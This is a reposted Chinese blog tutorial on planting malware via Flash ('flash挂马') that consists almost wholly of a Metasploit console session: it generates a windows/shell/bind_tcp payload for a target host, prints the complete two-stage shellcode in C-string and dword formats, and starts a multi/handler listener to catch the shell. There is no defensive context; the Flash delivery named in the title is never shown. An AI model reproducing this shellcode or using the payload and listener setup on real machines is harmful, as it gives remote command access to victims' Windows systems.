kali之flash挂马

发布时间:2020-07-29 14:11:17 作者:周小玉
来源:网络 阅读:1215

root@localhost:~# msfconsol

msf > show #寻求帮助

msf > use windows/shell/bind_tcp#
msf payload(bind_tcp) > set RHOST 192.168.48.100
RHOST => 192.168.48.100
msf payload(bind_tcp) > generate -tc
# windows/shell/bind_tcp - 298 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=192.168.48.100,
# EnableStageEncoding=false, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" +
"\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" +
"\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" +
"\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" +
"\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" +
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" +
"\xf6\x75\xec\xc3"

# windows/shell/bind_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" +
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" +
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" +
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +
"\xff\xd5"
msf payload(bind_tcp) > generate -t dword
// windows/shell/bind_tcp - 298 bytes (stage 1)
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=192.168.48.100,
// EnableStageEncoding=false, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x00323368, 0x73776800, 0x68545f32, 0x0726774c,
0x90b8d5ff, 0x29000001, 0x685054c4, 0x006b8029, 0x5050d5ff, 0x50405050, 0xea685040, 0xffe0df0f,
0xdb3197d5, 0x00026853, 0xe6895c11, 0x5756106a, 0x37dbc268, 0x53d5ff67, 0xe9b76857, 0xd5ffff38,
0x68575353, 0xe13bec74, 0x9757d5ff, 0x4d6e7568, 0x6ad5ff61, 0x56046a00, 0xd9026857, 0xd5ff5fc8,
0x406a368b, 0x00100068, 0x006a5600, 0x53a45868, 0x93d5ffe5, 0x56006a53, 0x02685753, 0xff5fc8d9,
0x29c301d5, 0x75f685c6, 0x0000c3ec

// windows/shell/bind_tcp - 240 bytes (stage 2)
// http://www.metasploit.com
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x646d6368, 0x57e38900, 0xf6315757, 0x5659126a,
0xc766fde2, 0x013c2444, 0x24448d01, 0x4400c610, 0x56565054, 0x4e564656, 0x56535656, 0x3fcc7968,
0x89d5ff86, 0x46564ee0, 0x086830ff, 0xff601d87, 0xb5f0bbd5, 0xa66856a2, 0xff9dbd95, 0x7c063cd5,
0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300
msf payload(bind_tcp) >  
msf payload(bind_tcp) > use exploit/multi/handler#监听
msf exploit(handler) > set payload windows/shell/bind_tcp#设置负载
payload => windows/shell/bind_tcp
msf exploit(handler) > run

[*] Starting the payload handler...
[*] Started bind handler

推荐阅读:
  1. 略谈框架挂马以及解决办法
  2. 虚拟主机网站怎样防止被挂马

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

flash 挂马 la

上一篇:Android实现把bitmap图片的某一部分的颜色改成其他颜色的方法

下一篇:C++如何实现哈夫曼树

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》